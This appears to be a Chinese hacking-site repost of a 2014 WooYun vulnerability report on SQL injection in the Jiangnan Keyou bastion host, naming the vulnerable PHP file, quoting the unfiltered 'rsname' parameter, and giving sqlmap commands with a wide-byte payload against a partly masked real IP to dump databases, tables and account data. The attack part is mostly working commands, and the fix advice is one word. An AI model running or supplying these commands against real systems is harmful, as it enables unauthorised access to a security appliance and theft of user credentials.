记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

江南科友堡垒机最新SQL注入之二可getshell

2014-12-25 00:40

0x01 存在漏洞的文件

/excel/sso_user_export.php

0x02 漏洞利用细节 存在漏洞的代码为

code 区域
$path = 'WEB-INF';

set_include_path(get_include_path() . PATH_SEPARATOR . $path);

require_once('../operation/SSoDB.php');

$db = new SSoDB();

if(!empty($_GET['rsname']))

{

$acc=$db->Getuserinfo($_GET['rsname']);

$filename="主机".$_GET['rsname']."帐户_".date('Y-m-d').".xls";

}

//...



用户提交的参数 $_GET['rsname'],没有经过任何的过滤直接进入了Getuserinfo函数,造成了注入

0x03 漏洞测试

直接使用SQLMAP进行漏洞测试

sqlmap.py -u "https://121.xxx.xxx.x8/excel/sso_user_export.php?rsname=aaa%bf*"

1.png



获取到的用户信息:

sqlmap.py -u "https://121.xxx.xxx.x8/excel/sso_user_export.php?rsname=aaa%bf*" --dbs

2.png



获取所有的用户表:

sqlmap.py -u "https://121.xxx.xxx.x8/excel/sso_user_export.php?rsname=aaa%bf*" --tables -D hacconf

3.png

漏洞证明:

账号信息:

4.png

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-077342

阅读:85835 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“江南科友堡垒机最新SQL注入之二可getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云